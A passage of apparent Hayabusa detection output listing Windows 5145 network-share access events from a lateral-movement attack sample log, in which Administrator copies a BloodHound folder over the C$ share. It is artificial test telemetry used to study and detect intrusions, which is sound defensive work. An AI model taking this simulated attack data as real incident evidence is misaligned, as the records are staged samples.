Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.287 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.287 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.297 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.297 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.297 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.317 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.317 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.317 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.317 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.327 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.327 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.327 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.327 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.337 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.337 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.337 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.337 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.347 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.347 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.347 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.347 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.357 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.357 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.357 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.357 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.367 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.367 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.367 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.367 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.377 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.377 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.377 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.377 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.387 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.387 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.387 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.387 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.397 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.397 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.397 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.407 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.407 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.407 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.407 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.418 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.418 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.418 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.418 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.428 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.428 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.428 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 